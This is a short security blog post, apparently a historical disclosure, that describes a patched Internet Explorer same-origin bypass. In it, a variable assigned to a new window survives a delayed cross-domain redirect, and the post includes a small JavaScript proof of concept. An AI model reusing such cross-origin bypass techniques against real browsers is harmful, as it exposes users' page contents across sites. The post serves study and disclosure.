Pseudo-UXSS — Injecting Variables into a Cross-Origin Window via Delayed Redirect

Opening a new window to a same-domain page that performs a server-side redirect to a different domain leaves a window of time during which JavaScript variables set on the new window persist — even after the redirect completes and the window is now cross-origin. The receiving page can read those variables directly.

<script language="JavaScript">
function openDelayedRedirect()
{
    var newWin = window.open("delayed_redirect.aspx");
    newWin.xDomainDocument = document;
}
</script>
<input type="button" value="Run PoC" onclick="openDelayedRedirect()">

The server-side redirect (delayed by one second) redirects to a different domain. The domain2.html page on that other domain can then access xDomainDocument — a reference to our original document object — and read its contents. The variable survives the navigation because the window object itself persists across same-origin redirects, and the SOP check on variable access was not enforced at assignment time.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — Prototype Property Crash on Properties Dialog] :: [UXSS — IE8 defineProperty Accessor Survives Cross-Origin Redirect] >